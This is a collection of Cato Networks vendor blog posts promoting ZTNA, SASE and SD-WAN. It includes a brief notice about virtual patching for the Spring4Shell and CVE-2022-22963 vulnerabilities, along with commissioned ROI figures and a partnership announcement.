Can You Really Trust Zero Trust Network Access? Why Yes The global economy's shift to hybrid work models is challenging enterprises to securely connect their work-from-anywhere employees. Supporting these highly distributed, dynamic, and diverse networks requires enterprises to be more flexible and accommodating, which results in remote access becoming an increasingly expanding attack surface. A crucial step in reducing this risk is transitioning from legacy VPNs, with their inherently risky castle-and-moat approach, to Zero Trust Network Access (ZTNA). The latter implements a much more restrictive access control mechanism, which allows users to connect to applications on a need-to-access only basis. Why Not ZTNA solutions, however, rely mostly on user authentication, and when this becomes compromised, a perpetrator still has the capability to wreak havoc in the enterprise network and its connected assets. User account takeovers are quite common and are achieved by way of social engineering (e.g. phishing) and other techniques. Security experts agree that enterprise security teams should work under the assumption that user accounts have been, or at some point will be, compromised. What’s Next Recognizing this risk, and as part of our continuous quest to provide our customers with better security, Cato has released the Client Connectivity Policy (CCP) feature. CCP acts as an additional layer of security when connecting remote employees to the enterprise network. It adds user or group-level validations based on the client platform (Operating system), location, and Device Posture information (fig. 1). Clients are granted access only after fully satisfying the defined connectivity policies. [caption id="attachment_24508" align="alignnone" width="1200"] Figure 1[/caption]   [boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | Download eBook [/boxlink] It is no longer enough to pass ZTNA authentication in order to access the enterprise network. The additional security layer added by Cato's CCP significantly reduces ZTNA related attack vectors, even for compromised accounts, and strengthens the enterprise's overall security posture. While Device Posture itself is commonly used as part of ZTNA, Cato's CCP is unique in that Device Posture is just one source of information used to make access decisions (fig. 2). CCP also enables numerous different Device Posture checks that can be defined, and selectively implemented, for different users and groups. This provides security teams a high degree of flexibility when defining connectivity policies. For example, highly stringent requirements for users with access to highly sensitive enterprise assets e.g., "the crown jewels", and more relaxed requirements for users with limited access and lower risk potential. [caption id="attachment_24510" align="alignnone" width="1200"] Figure 2[/caption]   The Bottom Line In the evolving threat landscape of remote access, Zero Trust is just too trusting. Cato's Client Connectivity Policy takes ZTNA an extra step by adding a security layer capable of blocking access from unauthorized clients, even when the user account has been compromised. By using several independent evaluation criteria, and highly flexible Device Posture profiles, Cato's CCP keeps your enterprise's security posture one step ahead of your next attack.    

Cato Patches Vulnerabilities in Java Spring Framework in Record Time

Two Remote Code Execution (RCE) vulnerabilities have been discovered in the Java Spring framework used in AWS serverless and many other Java applications. At least one of the vulnerabilities has been currently assigned a critical severity level and is already being targeted by threat actors. Within 20 hours of the disclosure, Cato Networks customers were...
Cato Patches Vulnerabilities in Java Spring Framework in Record Time Two Remote Code Execution (RCE) vulnerabilities have been discovered in the Java Spring framework used in AWS serverless and many other Java applications. At least one of the vulnerabilities has been currently assigned a critical severity level and is already being targeted by threat actors. Within 20 hours of the disclosure, Cato Networks customers were already protected from attacks on both vulnerabilities as Cato Networks security researchers researched, signed and enforced virtual patching across Cato SASE Cloud. No Cato Networks systems are affected by this vulnerability. The two vulnerabilities come following a recent release of a Spring Cloud Function. One vulnerability, Spring4Shell, is very severe and exploited in the wild. No patch has been issued. The second vulnerability, CVE-2022-22963, in the Spring Cloud Function has now been patched by the Spring team who issued Spring Cloud Function 3.1.7 and 3.2.3. Within 20 hours of the discovery, Cato customers were already protected against attacks against the vulnerabilities through virtual patches deployed across Cato. Cato researchers had already identified multiple exploitation attacks by threat actors. While no further action is needed, Cato customers are advised to patch any affected systems. Similar to the Log4j vulnerability, CVE-2022-22963 already has multiple POCs and explanations on GitHub – making it easy to utilize by attackers. As part of the mitigation efforts by Cato’s security and engineering team we verified that no Cato Networks system has been affected by this vulnerability. As we have witnessed with Log4j, vulnerabilities such as these can take organizations a very long time to patch. Log4j exploitations are still observed to this day, four months after its initial disclosure. Subsequent vulnerabilities may also be discovered and Cato’s security researchers will continue to monitor and research for these and other CVEs – ensuring customers are protected.    

Renewing Your SD-WAN? Here’s What to Consider

The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere. 4 Things to Consider Before...
Renewing Your SD-WAN? Here’s What to Consider The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere. 4 Things to Consider Before Renewing your SD-WAN Contract Consideration #1: Security Enterprises need to reduce their attack surface, ensuring that only required assets are accessible, and only to authorized users. Questions to ask yourself: Does my SD-WAN solution include advanced security models like ZTNA? How does my SD-WAN’s security solution integrate with other point solutions? Does my SD-WAN solution offer threat prevention and decryption? Consideration #2: Cloud Optimization Traffic from and to the cloud needs to be optimized in terms of performance and security. Questions to ask yourself: How does my SD-WAN solution manage multi-cloud environments? Does my SD-WAN solution provide migration capabilities? Can my SD-WAN solution scale according to my needs? [boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink] Consideration #3: Global Access Enterprises need predictable and reliable transport to connect global locations to the cloud and data centers. Questions to ask yourself: Does my SD-WAN solution provide a global infrastructure to ensure low latency and optimized routing? How does my SD-WAN solution ensure secure global access? Will my SD-WAN solution provide an alternative in case of a network outage? Consideration #4: Remote Access Remote access for employees and external vendors needs to be supported to ensure business agility. Questions to ask yourself: How does my SD-WAN solution secure remote users? How does my SD-WAN solution ensure remote users get optimized performance? Does my SD-WAN solution protect from supply chain attacks? SASE, the Next Step After SD-WAN SASE (Secure Access Service Edge) provides value in areas where SD-WAN lacks. SASE is the next step after SD-WAN because it provides enterprises with all the point solutions’ advantages, but without the friction of integrating and maintaining them. SASE is a single platform that converges SD-WAN and network security into a single, cloud-native global service. In fact, according to Gartner, by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020. How SASE Answers Network and Security Requirements Let’s see how SASE provides a solution for each of the considerations above. Security – SASE’s converged, full security stack extends advanced and up-to-date security measures to all edges. Cloud optimization – SASE provides frictionless and optimized cloud service with immediate scaling capabilities everywhere. Global access – SASE PoPs deliver the service to users and locations that are nearest to them, as well as accelerating east-west and northbound traffic to the cloud. Remote access – SASE delivers secure remote access, with the ability to instantly scale to address the new work-from-anywhere reality. SD-WAN vs. SASE After SD-WAN solves the branch-data center-edge challenge, SASE enables enterprises to globally expand their environment to the cloud in an optimized and secure manner. Let’s see how the two compare: How to Get Started with SASE Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.    

5 SD-WAN Gaps that are Answered by SASE

When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them. What’s the alternative? According to Gartner, it’s SASE (Secure Access...
5 SD-WAN Gaps that are Answered by SASE When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them. What’s the alternative? According to Gartner, it’s SASE (Secure Access Service Edge), an architecture that converges SD-WAN and security point solutions into a unified and cloud-native service. Gartner predicts that by 2024 more than 60% of SD-WAN customers will implement a SASE architecture. This blog post will help you understand which SD-WAN gaps are answered by SASE, and how they are reconciled. To read the entire analysis, you can read the e-book. SASE vs. SD-WAN for Enterprises Let’s look at five network and security considerations modern enterprises have and how SD-WAN and SASE each respond to them. 1. Advanced Security Enterprises today must prepare for cybersecurity attacks by implementing security solutions that will protect their critical applications. With SD-WAN, IT teams are required to add additional appliances, like NGFW, IPS and SWG. This increases the cost of deployments and complicates maintenance. SASE, on the other hand, has a built-in network security stack that secures all edges and all locations. 2. Remote Workforce The hybrid work model is here to stay. Employees will continue to connect from home or other external locations, and third parties require access to the network as well. SD-WAN does not support this type of connectivity, since it was designed for replacing MPLS between physical locations. SASE, on the other hand, connects remote users from anywhere to the nearest PoP (point of presence), for optimized and secure access.   [boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink] 3. Cloud Readiness Cloud connectivity is essential for business agility, global connectivity and access to business applications. SD-WAN is limited in cloud-readiness, and requires management and integration of proprietary appliances and expensive cloud connectivity solutions. SASE, on the other hand, is based on cloud datacenters that are connected to the SASE cloud. In addition, cloud applications don’t require integration and application traffic from edges is sent to cloud instances.   4. Global Performance Global connectivity is the backbone of businesses, but SD-WAN provides connectivity through third-party backbone providers, which are not always reliable. SASE has a private global backbone that is WAN optimized.   5. Simple Management Work has become more complicated and noisy than ever, so IT teams need a solution that will reduce overhead, not add to it. SD-WAN and security solutions require IT teams to manage, maintain and troubleshoot functions separately. SASE converges all functions, providing visibility and simple, centralized management.   Conclusion Enterprises today need their IT and security to support and accelerate the development and delivery of new products, and to help them respond to business changes. SASE lowers business costs, complexity and risks by connecting network and security into a holistic platform. To learn more about how SASE can replace SD-WAN and help IT teams prepare for the needs and opportunities of tomorrow, read the e-book. To get a consultation and understand how SASE can answer your specific needs, contact us.  

The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan

In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change – by making a strategic leap towards a network...
The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change - by making a strategic leap towards a network and security architecture that enables rapid and agile digital transformation. After all, today’s point solutions that only address cloud migration, remote work or certain security threats, will only remain relevant for so long. This blog post breaks down the considerations and requirements of strategic change, while comparing two courses of action - transforming early or waiting for the last minute - and proposes a plan for gradual adoption of SASE. If you’d like to read a more in-depth breakdown of the process, with calculations and user testimonials, you’re welcome to view the e-book that this blog is based on. 5 Expected Network Demands in the Near Future The first step to take when deciding how to address network changes is to understand what to expect, i.e why IT teams even need to change course. Let’s look at five network demands IT teams will probably encounter in the (very) near future. 1. Accelerated Application Migration to the Cloud As more teams require access to applications and infrastructure in the cloud, IT teams need to find ways to manage user and service access, deal with “Shadow IT” and enforce cloud policies from legacy networks. This is essential for ensuring secure connectivity and business continuity. 2. Rising MPLS Bandwidth Costs MPLS is expensive and eats up a large portion of IT spend. As applications generate more traffic, video and data, costs are expected to go up even more. IT teams need to find a more cost-effective replacement, or get a higher budget. 3. Connecting Remote Workers Remote and hybrid work are expected to stay long after Covid-19. But, ensuring performance, security and user experience for WFA users with traditional remote-access VPN is mission impossible for IT teams. This requires a long-term solution that is both stable and reliable. 4. Connecting the Supply Chain The new workforce consists of contractors, consultants and other service providers that require network access. However, connecting these outsourced suppliers also creates security threats. IT teams need to find a solution that enables external collaboration without the risk. 5. Rapid Global Expansion Organizations are growing and expanding, both organically and through acquisitions. Many times, expansion takes place into new geographies and locations. IT teams are required to integrate new employees and users as quickly and seamlessly as possible, within hours and days, not months.   New Networking Demands Create New Organizational Challenges Now that we’ve listed these network challenges, let’s understand what they mean for IT teams, on an organizational level. Upgrades and Replacements for Hardware Appliances - More users and traffic mean more required network bandwidth. Once existing appliances reach their limit, they will need to be updated, which is both expensive and time-consuming. Increased Cost of Human Resources - Securing and managing applications and services requires human talent and time. This means training, hiring or off-loading to a third party. The Telco Headache - Managing a relationship with a Telco can be frustrating and cause major overhead. As needs grow, it will become even more difficult to find the right person who will take responsibility, answer tickets and respond to requests in a timely manner. [boxlink link="https://www.catonetworks.com/resources/the-roi-of-doing-nothing/?utm_source=blog&utm_medium=top_cta&utm_campaign=roi_of_doing_nothing"] The ROI of Doing Nothing | EBOOK [/boxlink] The Solution: Build a Digital Strategy and Act On It With so many complicated networking challenges around the horizon, the question isn’t whether to transform, only when. To answer this question, it’s important to have a strategy in place. This strategy will allow you to address future challenges with ease and expertise, while eliminating headaches. Let’s look at two ways to build and act on a digital strategy. The Cost of Acting Now vs. Acting Later Businesses today face two options. For simplicity, let’s divide them into two stages: 1 and 2.   Stage 1 businesses are those that spend a significant, yet manageable, amount of their budget on MPLS. On the contrary, stage 2 companies spend an extremely large amount of money on MPLS, as new locations and workers that need to connect cloud applications and locations are added to the network. IT teams can transform technologically when businesses are either in stage 1 or stage 2. By transforming early, problems of digital transformation can be easily avoided. Instead of putting out fires, stage 1 companies have time to plan, think through issues and devise a strategy for today and tomorrow’s requirements. Stage 2 companies, on the other hand, are in the worst position to make a transition. This is because the money, resources and time spent on legacy solutions will determine how much money, resources and time they will have for new challenges, impacting the success and ROI of the new solution. Putting out fires is the worst reason to make a strategic decision. The SASE Solution To Rapid Digital Transformation According to Gartner, “Current network strategy architectures were designed with the enterprise data center as the focal point for access needs. Digital business has driven new IT architectures like cloud and edge computing and work-from-anywhere initiatives, which have in turn, inverted access requirements, with more users, devices, applications, services and data located outside of an enterprise than inside. The Covid-19 pandemic accelerated these trends.” The industry has rallied around Gartner’s SASE (Secure Access Service Edge) architecture as the best solution to meet the challenges introduced by cloud, mobility and other dynamic shifting network traffic (which we described above). This is because SASE provides: Cloud-native connectivity Worldwide access Secure access High performance Access to any resource, including cloud applications and the Internet A broad range of capabilities - NGFW, IPS, MDR and more Scalability, without rigid constraints   5 Steps to SASE Adoption: Think Strategically While Acting Gradually We’ve determined that the current network is the problem and that SASE is the solution. This begs the question, how can IT teams adopt SASE without disrupting the business? SASE can be adopted gradually and grow incrementally as current MPLS contracts expire. Here are the five steps to take to enable digital transformation and prepare your network for “whatever’s next”: Step 1: No Change - Deploy SD-WAN devices to connect certain sites to MPLS and the Internet. The rest of the network and MPLS connections remain unmodified. Step 2: Complement MPLS - Deploy SASE where MPLS is unavailable or too expensive, to improve connectivity to WAN applications. Step 3: Introduce Security - Deploy functions like NGFW, Web gateways IPS, anti-malware, zero trust as existing applications meet end-of-life or can’t scale, or to new edges. Step 4: Optimize Datacenter Access - Implement advanced routing to benefit SaaS applications instead of having them rely on the Internet, which is erratic. Step 5: Connect Remote Users - Bring mobile and WFA users to the SASE cloud for optimized performance with ZTNA, while removing VPNs, servers, and other devices. Conclusion: Time to Spring Into Action Act now. You can start with a plan, a partial transition or testing, but don’t wait. By doing so, you will prevent: High MPLS costs Management overhead of siloed appliances and external services Skyrocketing costs of complex MPLS networks Constrained resources when MPLS costs rise IT challenges to support network and security complexity Slow and bulky networks that can’t meet digital transformation requirements Low ROI following network and digital transformation To learn more about the considerations and see a breakdown of transition costs and savings, access the ebook The ROI of Doing Nothing. To see how organizations can save money and achieve more than 200% ROI with Cato SASE Cloud, read the Forrester TEI (Total Economic Impact) Report.    

Does WAN transformation make sense when MPLS is cheap?

WAN transformation with SD-WAN and SASE is a strategic project for many organizations. One of the common drivers for this project is cost savings, specifically the reduction of MPLS connectivity costs. But, what happens when the cost of MPLS is low? This happens in many developing nations, where the cost of high-quality internet is similar...
Does WAN transformation make sense when MPLS is cheap? WAN transformation with SD-WAN and SASE is a strategic project for many organizations. One of the common drivers for this project is cost savings, specifically the reduction of MPLS connectivity costs. But, what happens when the cost of MPLS is low? This happens in many developing nations, where the cost of high-quality internet is similar to the cost of MPLS, so migration from MPLS to Internet-based last mile doesn’t create significant cost savings. Should these customers stay with MPLS? While every organization is different, MPLS generally imposes architectural limitations on enterprise WANs which could impact other strategic initiatives. These include cloud migration of legacy applications, the increased use of SaaS applications, remote access and work from home at scale, and aligning new capacity, availability, and quality requirements with available budgets. In short, moving away from MPLS prepares the business for the radical changes in the way applications are deployed and how users access them. Legacy MPLS WAN Architecture: Plane Old Hub and Spokes MPLS WAN was designed decades ago to connect branch locations to a physical datacenter as a telco-managed network. This is a hard-wired architecture, that assumes most (or all) traffic needs to reach the physical datacenter where business applications reside. Internet traffic, which was a negligible part of the overall enterprise traffic, would backhaul into the datacenter and securely exit through a centralized firewall to the internet.   [boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls?utm_source=blog&utm_medium=top_cta&utm_campaign=windstream_partnership_news"] What Others Won’t Tell You About MPLS | EBOOK [/boxlink] Cloud migration shifts the Hub Legacy MPLS design is becoming irrelevant for most enterprises. The hub and spokes are changing. For example, Office365. This SaaS application has dramatically shifted the traffic from on-premises Exchange and SharePoint in the physical datacenter, and offline copies of Office documents on users’ machines, to a cloud application. The physical datacenter is eliminated as a primary provider of messaging and content, diverting all traffic to the Office 365 cloud platform, and continuously creating real-time interaction between user’s endpoints and content stores in the cloud. If you look at the underlying infrastructure, the datacenter firewalls and datacenter internet links carry the entire organization's Office 365 traffic, becoming a critical bottleneck and a regional single point of failure for the business.   Work from home shifts the Spokes Imagine now, that we suddenly moved to a work-from-home hybrid model. The MPLS links are now idle in the deserted branches, and all datacenter inbound and outbound traffic is coming through the same firewalls and Internet links likely to create scalability, performance, and capacity challenges. In this example, centralizing all remote access to a single location, or a few locations globally, isn’t aligned with the need to provide secure and scalable access to the entire organization in the office and at home.   Internet links offer better alignment with business requirements than MPLS While MPLS and high-quality direct internet access prices are getting closer, MPLS offers limited choice in aligning customer capacity, quality, and availability requirements with underlay budget. Let’s look at availability first. While MPLS comes with contractually committed time to fix, even the most dedicated telco can’t always fix infrastructure damage in a couple of hours over the weekend. It may make sense to use a wired line and wireless connection managed by edge SD-WAN device to create physical infrastructure redundancy. Capacity and quality pose a challenge as well. Traffic mix is evolving in many locations. For example, a retail store may want to run video traffic for display boards which will require much larger pipes. Service levels to that video streams, however, are different than those of Point-of-Sale machines. It could make sense to run the mission-critical traffic on MPLS or high-quality internet links and the best-effort video traffic on low-cost broadband links, all managed by edge SD-WAN. Furthermore, if the video streams reside in the cloud, running them over MPLS will concentrate massive traffic at the datacenter firewall and Internet link chokepoint. It would make more sense to go with direct internet access connectivity at the branch, connect directly to the cloud application and stream the traffic to the branch. This requires adding a cloud-based security layer that is built to support distributed enterprises.   The Way Forward: MPLS is Destined to be replaced by SASE Even if you don’t see immediate cost savings, shifting your thinking from MPLS-based network design to an internet- and cloud-first mindset is a necessity. Beyond the underlying network access, a SASE platform that combines SD-WAN, cloud-based security, and zero-trust network access will prepare your organization for the inevitable shift in how users’ access to applications is delivered by IT in a way that is optimized, secure, scalable, and agile. In Cato, we refer to it as making your organization Ready for Whatever’s Next.    

Windstream Enterprise partners with Cato Networks to Deliver Cloud-native SASE to organizations in North America

We are proud and excited to announce our partnership with Windstream Enterprise (WE), a leading Managed Service Provider (MSP) delivering voice and communication services across North America. WE will offer Cato’s proven and mature SASE platform to enterprises of all sizes. Cato offers WE a unique business and technical competitive advantage. By leveraging Cato’s SASE...
Windstream Enterprise partners with Cato Networks to Deliver Cloud-native SASE to organizations in North America We are proud and excited to announce our partnership with Windstream Enterprise (WE), a leading Managed Service Provider (MSP) delivering voice and communication services across North America. WE will offer Cato’s proven and mature SASE platform to enterprises of all sizes. Cato offers WE a unique business and technical competitive advantage. By leveraging Cato’s SASE platform, WE can rapidly deploy a wide range of networking and security capabilities across locations, users, and applications to enable customers’ digital transformation journeys. Unlike SASE solutions composed from point products, Cato’s converged platform enables WE to get to market faster with a feature-rich SASE solution and meet unprecedented customer demand. Agility and velocity are critical for both partners and customers today. Businesses expand geographically, grow through M&A, instantly adapt to new ways of work, and must protect themselves against the evolving threat landscape. These ever-changing requirements call for dynamic, scalable, resilient, and ubiquitous network and security infrastructure that can be ready for whatever comes next. [boxlink link="https://www.catonetworks.com/news/windstream-enterprise-delivers-sase-solution-with-cato-networks/?utm_source=blog&utm_medium=top_cta&utm_campaign=windstream_partnership_news"] Windstream Enterprise Delivers North America’s First Comprehensive Managed SASE Solution with Cato Networks | News [/boxlink] This is the promise of SASE that Cato Networks has been perfecting for the past seven years. There is no other SASE offering in the market that can deliver on that promise with the same simplicity, velocity, and agility as Cato. Here are some of the benefits that WE and our mutual customers will experience with Cato SASE: Rapidly evolving networking and security capabilities: Cato’s cloud-native software stack includes SD-WAN, Firewall as a Service (FWaaS), Secure Web Gateway (SWG), Advanced Threat Prevention with IPS and Next-Gen Anti-Malware, Cloud Access Security Broker (CASB) and Zero Trust Network Access (ZTNA). Cato experts ensure these capabilities rapidly evolve and adapt to new business requirements and security threats without any involvement from our partners and customers. Instant-on for locations and users: WE can connect enterprise customers locations and users to Cato quickly through zero-touch provisioning and let the Cato SASE Cloud handle the rest (route optimization, quality of service, traffic acceleration, and security inspection). Elastic capacity, available anywhere: Cato SASE Cloud can handle huge traffic flows of up to 3 Gbps per location in North America and globally through a dense footprint of Points-of-Presence (PoPs). No capacity planning is needed. Fully automated self-healing: Cato’s cloud-native SASE is architected with automated intelligent resiliency from the customer edge to the cloud service PoPs. High availability by design ensures service continuity without any human intervention. No need for complex HA planning and orchestration. True single pane of glass: Since Cato is a fully converged platform, it was built with a single management application to manage all configuration, reporting, analytics, and troubleshooting across all functions. Additionally, customers gain access to WE Connect Portal to enable easy configuration, analysis, and automation of their fully cloud-native SASE framework. Through our partnership, powerful SASE managed services become easier and more efficient to deliver. Cato and WE are ready to usher customers into a new era where advanced managed services meet a cloud-native software platform to create a customer experience and deliver customer value like never before.    

Eye-Opening Results from Forrester’s Cato SASE Total Economic Impact Report

We’ve been touting the real-world benefits of Cato SASE on our Web site and in seminars, case studies, and solution briefs since the company was founded, but how do those benefits translate into hard numbers? We decided it was time to quantify Cato SASE’s real-world financial benefit with a recognized, well-structured methodology, so we commissioned...
Eye-Opening Results from Forrester’s Cato SASE Total Economic Impact Report We’ve been touting the real-world benefits of Cato SASE on our Web site and in seminars, case studies, and solution briefs since the company was founded, but how do those benefits translate into hard numbers? We decided it was time to quantify Cato SASE’s real-world financial benefit with a recognized, well-structured methodology, so we commissioned a Total Economic Impact (TEI) study with the consulting arm of the leading analyst firm Forrester. Forrester interviewed several Cato customers in-depth and used its proprietary TEI methodology to come up with numbers for investment impact, benefits, costs, flexibility, and risks. More on this later. The results were impressive. According to Forrester, Cato’s ROI came out to 246% over three years with total savings of $4.33 million net present value (NPV) and a payback of the initial investment in under six months. Those numbers don’t include additional savings from less tangible benefits such as risk reduction. The $4.33 million NPV savings break down this way: $3.8 million savings in reduced operations and maintenance $44,000 savings in reduced time to configure Cato at new sites $2.2 million savings from retiring all the systems replaced by Cato Networks Investment of $1.76 million over three years $6.09 million – $1.76 million = $4.33 million NPV. Numbers Are Only Half the Story The numbers are certainly impressive, but some of the unquantified benefits the report picked up were perhaps even more enlightening: Improved employee morale: Team members reported that the activities they were able to shift to after switching to Cato—optimizing systems, for example--were considerably more rewarding than the more mundane activities of setting up, updating, and managing a lot of equipment before Cato. Consistent security rules: Deploying Cato revealed a lot of inconsistencies in organizations’ governing and securing of network traffic across different sites. The Cato SASE Cloud was able to quickly consolidate all that mess into a single global set of rules, with an obvious positive impact on both security and management. Reduced time and transit costs: Cato equipment moves through customs without delay or assessments of value-added tax (VAT). This is because Cato Sockets are very simple devices that simply direct traffic to our cloud, where most of the complex encryption and other technologies lie. Better application performance: We expected this result, which comes from improved network performance. Overall, respondents describe a transformative, before/after experience. [boxlink link="https://www.catonetworks.com/resources/the-total-economic-impact-of-cato-networks/?utm_source=blog&utm_medium=top_cta&utm_campaign=tei_report"] The Total Economic Impact™ of Cato Networks | Report [/boxlink] Before Cato, the organizations had to dedicate separate teams to the costly, time-consuming complexities of managing VPNs, Internet, WAN, and other functions, including spending a lot of time and resources deploying updates at each individual site. Adding new sites was a complex time-consuming process. All that mundane work made it difficult to execute the corporate digital transformation strategy. As one technology director said about why he turned to Cato, “My goal was, I don’t want my team worrying about how to get a packet from A to B. I’m interested in Layer 7 of the network stack. I want to know: Are applications behaving the way they should? Are people getting the performance they should? Are we secure? You don’t have time to answer that if you’re worried about getting it from A to B.” After Cato, all of the updates and most of the management were simply delegated to the Cato SASE Cloud. All the remaining network and security oversight required by the customer could be accomplished through a single Cato dashboard. This allowed organizations to redirect all those “before” resources to value-added activities such as system optimization, onboarding new acquisitions, and fast deployment of new sites. The resulting employee satisfaction benefits were substantial. As a technology director said, “What I heard from my team is, ‘I love that the problems I’m solving on a day-to-day basis are on a completely different order than what I used to have to deal with before.’ They think about complex traffic problems and application troubleshooting and performance.” Setting up new sites was also vastly easier with Cato, as one IT manager said. “Honestly I was shocked to see how easy it was to set up and maintain an SD-WAN solution based on the whole Cato dashboard. Now there’s a saying that with [unnamed previous solution] you need 10 engineers to set it up and 20 engineers to keep it running. With Cato this all went away.” How Forrester Got The Numbers Forrester’s findings were the result of in-depth interviews with five decision-makers whose organizations are Cato customers. Forrester compared data based on their experiences prior to deploying Cato with a composite organizational model of a “vanilla” customer. The description of the five decision-makers is in the table below. The report describes the composite organization that is representative of the five decision-makers that Forrester interviewed and is used to present the aggregate financial analysis in the next section. The global company is headquartered in the U.S. with 40 sites across the U.S., Europe, and the Asia Pacific region growing to 61 by year three. It also has two on-premises and two cloud datacenters in the U.S, one on-premises and two cloud-based datacenters in Europe, and two cloud-based datacenters in Asia Pacific. Year one remote users total 1,500 growing to 2,100 by year three. Forrester then used its proprietary TEI methodology to construct a financial model with risk-adjusted numbers. The TEI modeling fundamentals included investment impact, benefits, costs, flexibility, and risks. Some of the more dramatic savings numbers came in operations and maintenance: The organization was able to redirect 10 full-time employees (FTEs) from operations and maintenance to more value-adding activities in year one. By year three it avoided having to hire 12 more FTEs that would have had to manage the previous solution. The average fully loaded annual compensation for a single full-time data engineer is $148,500. Lots of savings also came from retired systems, including the traditional edge router, perimeter next-generation firewall appliances, intrusion detection and prevention systems, and SD-WAN. And then there were benefits from Cato’s remote access flexibility. As one IT team manager said, “When COVID hit we were able to add the entire company to the VPN and provide them the ability to work from home in a matter of days. That was amazing.” (Follow the link to read more about Cato’s approach to secure remote access). I could go on but take a look for yourself. There’s a lot more juicy data in the report and it’s pretty surprising at times and not a difficult read. You can access The Total Economic Impact™ of Cato Networks report following the link.    

Is SD-WAN Enough for Global Organizations?

SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation. This blog post lists the top considerations for enterprises that are...
Is SD-WAN Enough for Global Organizations? SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation. This blog post lists the top considerations for enterprises that are evaluating and deploying SD-WAN. It is based on the e-book “The Dark Side of SD-WAN”. Last Mile Considerations SD-WAN provides organizations with flexibility and cost-efficiency compared to MPLS. For the last mile, SD-WAN users can choose their preferred service, be it MPLS or last-mile services like fiber, broadband, LTE/4G, or others. When deciding which last-mile solution to choose, we recommend taking the following criterion into consideration: Costs Redundancy (to ensure availability) Reliability Learn more about optimizing the last mile. Middle Mile Considerations MPLS provides predictability and stability throughout the middle mile. When designing the SD-WAN middle mile, organizations need to find a solution that provides the same capabilities. Relying on the Internet is not recommended, since it is unpredictable. The routers are stateless and control plane intelligence is limited, which means routing decisions aren’t based on application requirements or current network levels. Instead, providers’ commercial preferences often take priority. Learn more about reliable global connectivity. Security Considerations Distributed architectures require security solutions that can support multiple edges and datacenters. The four main options enterprises have today are: The SD-WAN Firewall Pros: - Built into the SD-WAN appliance Cons: - Do not inspect user traffic Purchasing a Unified Threat Management Device Pros: - Inspects user traffic Cons: - Requires a device for each location, which is costly and complex Cloud-based Security Pros: - Eliminated firewalls at every edge Cons: - Based on multiple devices - the datacenter firewall, the SD-WAN and the cloud security device. This is also costly and complex. A Converged Solution SASE (Secure Access Service Edge) - converges SD-WAN at the edge and security in the middle, with one single location for policy management and analytics. Cloud Access Optimization Considerations In a modern network, external datacenters and cloud applications need to be accessed by the organization’s users, branches and datacenters. Relying on the Internet is too risky in terms of performance and availability. It is recommended to choose a solution that offers premium connectivity or to choose a cloud network that egresses traffic from edges as close as possible to the target cloud instance. [boxlink link="https://www.catonetworks.com/resources/the-dark-side-of-sd-wan-are-you-prepared?utm_source=blog&utm_medium=top_cta&utm_campaign=dark_side_ebook"] The Dark Side of SD-WAN | Read The eBook [/boxlink] Network Monitoring Considerations When monitoring the network, enterprises need to be able to identify issues in a timely manner, open tickets with ISPs and work with them until the issue is resolved. It is recommended to set up 24/7 support and monitoring to orchestrate this and prevent outages that could impact the business. Considerations When Managing the SD-WAN Transitioning to SD-WAN requires deciding how to manage relationships with all the last-mile ISPs, as well as the network itself. You can manage these internally or outsource to providers. Ask yourself the following questions: Is it easier to manage multiple providers directly or through a single external aggregator? How much control do you need over deployment and integrations? What are your priorities for your internal talent’s time and resources? Conclusion Organizations today need to shift to support the growing use of cloud-based applications and mobile users. SD-WAN is considered a viable option by many. But is it enough? Use this blog post to evaluate if and how to implement SD-WAN. To get more details, read the complete e-book. To learn more about SASE, let’s talk.    

8 Reasons Enterprises are Adopting SASE Globally

SASE (Secure Access Service Edge) is a new enterprise architecture technology that converges all network and security needs, by design. By replacing all point solutions, SASE provides a unified, global and cloud-based network that supports all edges. As a result, SASE solutions improve organizational performance, business agility and connectivity. They also reduce IT overhead. Ever...
